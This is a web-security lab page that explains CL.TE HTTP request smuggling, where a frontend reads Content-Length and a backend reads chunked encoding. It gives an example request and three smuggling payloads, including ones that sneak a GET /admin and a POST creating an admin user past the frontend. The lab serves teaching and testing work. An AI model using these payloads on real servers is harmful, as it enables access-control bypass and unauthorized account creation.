Content-Length vs Transfer-Encoding parsing differences
This lab demonstrates a basic CL.TE (Content-Length vs Transfer-Encoding) HTTP Request Smuggling vulnerability. The frontend server uses Content-Length to determine the request body length, while the backend server uses Transfer-Encoding: chunked.
Objective: Send a malformed HTTP request that exploits the parsing difference between frontend and backend servers to smuggle additional requests.
// Vulnerable: Different parsing between frontend and backend // Frontend uses Content-Length // Backend uses Transfer-Encoding: chunked // Example vulnerable request: POST /1.php HTTP/1.1 Host: example.com Content-Length: 13 Transfer-Encoding: chunked 0 SMUGGLED // Frontend sees: Content-Length: 13 (reads 13 bytes) // Backend sees: Transfer-Encoding: chunked (reads until 0\r\n) // Result: "SMUGGLED" becomes the start of the next request
0\r\n\r\nSMUGGLED - Basic CL.TE payload0\r\n\r\nGET /admin HTTP/1.1\r\nHost: example.com\r\n\r\n - Admin access0\r\n\r\nPOST /api/users HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\nuser=admin - API accessTry these payloads in the request body:
0\r\n\r\nSMUGGLED0\r\n\r\nGET /admin HTTP/1.1\r\nHost: example.com\r\n\r\n0\r\n\r\nPOST /api/users HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\nuser=adminUse these curl commands to test the vulnerability: